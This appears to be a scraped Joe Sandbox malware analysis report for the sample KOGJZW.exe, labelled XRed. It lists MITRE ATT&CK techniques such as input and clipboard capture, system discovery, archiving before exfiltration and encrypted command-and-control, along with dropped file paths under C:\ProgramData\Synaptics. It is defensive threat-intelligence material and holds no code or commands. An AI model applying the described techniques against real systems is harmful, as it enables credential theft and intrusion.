Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report KOGJZW.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: XRed

Yara Signatures

Initial Sample

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Program Files (x86)\Microsoft Office\root\vfs\Common AppData\Microsoft\OFFICE\Heartbeat\HeartbeatCache.xml

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Synaptics.exe_a5c396d0e6d651f539cd1b6dccb863d9c272052_455b7b6e_5d3ee6c6-0f5d-4fe4-b684-134427407a08\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WER1AC2.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER2A44.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER2AB3.tmp.xml

C:\ProgramData\Synaptics\RCX97B8.tmp

C:\ProgramData\Synaptics\Synaptics.exe

C:\ProgramData\Synaptics\Synaptics.exe:Zone.Identifier

Windows Analysis Report
KOGJZW.exe

Description:	Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system.Peripheral devices could include auxiliary resources that support a variety of functionalities such as keyboards, printers, cameras, smart card readers, or removable storage. The information may be used to enhance their awareness of the system and network environment or may be used for further actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre